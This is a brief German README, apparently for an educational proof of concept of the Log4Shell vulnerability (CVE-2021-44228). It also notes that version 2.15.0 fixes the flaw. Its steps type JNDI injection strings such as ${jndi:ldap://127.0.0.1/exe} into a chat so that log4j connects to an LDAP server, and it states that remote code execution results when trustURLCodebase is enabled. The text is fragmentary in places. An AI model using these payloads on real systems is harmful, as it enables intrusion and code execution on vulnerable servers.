
Log4j-RCE (CVE-2021-44228) Proof of Concept mit zusätzlichen Informationen
Dies ist ein Proof of Concept des log4j RCE.
Hier sind einige Links zu CVE-2021-44228:
Dieser Fehler betrifft fast alle log4j2- und möglicherweise log4j1-Versionen. Die empfohlene Version ist 2.15.0, die den Exploit behebt.
${jndi:ldap://127.0.0.1/e} in den Chat ein. Wenn ein offener Socket auf Port 389 vorhanden ist, versucht log4j eine Verbindung herzustellen und blockiert die weitere Kommunikation, bis ein Timeout eintritt.THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT!, was ein serialisiertes String-Objekt vom LDAP-Server ist.
${jndi:ldap://127.0.0.1/exe} in den Chat ein. Wenn -Dcom.sun.jndi.ldap.object.trustURLCodebase=true auf true gesetzt ist, erfolgt die Remote-Code-Ausführung.
Dieses Projekt dient nur zu Bildungszwecken.